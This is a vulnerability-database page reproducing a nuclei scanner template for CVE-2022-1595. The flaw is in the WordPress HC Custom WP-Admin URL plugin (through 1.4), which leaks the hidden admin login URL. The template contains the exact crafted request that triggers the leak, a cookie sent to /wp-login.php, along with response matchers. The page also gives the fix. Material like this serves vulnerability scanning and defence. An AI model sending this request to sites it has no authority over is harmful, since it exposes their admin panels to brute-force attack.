Lucene search
K

WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure. Leaks secret login URL

Related
Refs
Code
id: CVE-2022-1595

info:
  name: WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure
  author: theamanrawat,oleveloper
  severity: medium
  description: |
    The HC Custom WP-Admin URL WordPress plugin through 1.4 leaks the secret login URL when sending a specific crafted request
  impact: |
    Attackers can obtain the secret custom admin login URL by sending crafted requests with specific cookies, potentially facilitating brute force attacks against the admin panel.
  remediation: |
    Update to the latest version of WordPress HC Custom WP-Admin URL plugin (>=1.5) to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/0218c90c-8f79-4f37-9a6f-60cf2f47d47b
    - https://wordpress.org/plugins/hc-custom-wp-admin-url/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1595
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-1595
    cwe-id: CWE-200
    epss-score: 0.02621
    epss-percentile: 0.8354
    cpe: cpe:2.3:a:hc_custom_wp-admin_url_project:hc_custom_wp-admin_url:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
  tags: cve,cve2022,unauth,wpscan,wordpress,wp-plugin,wp,hc-custom-wp-admin-url,vuln

http:
  - raw:
      - |
        HEAD /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: valid_login_slug=1

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - "(?i)Set-Cookie:.*wordpress_logged_in_"

      - type: regex
        part: header
        regex:
          - "(?i)Location:.*(/wp-admin/|/[^/]+/wp-login\\.php)"

      - type: status
        status:
          - 302
# digest: 490a0046304402202f4156dbeafb1e53cd00edadf73496fc3ad273492c733b1d5b4ee035040dc2d10220632ad134a396e074993830b8731c6285a98851d272722ebc15fec370f51f0944:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 25
CVSS 3.15.3
EPSS0.02621
33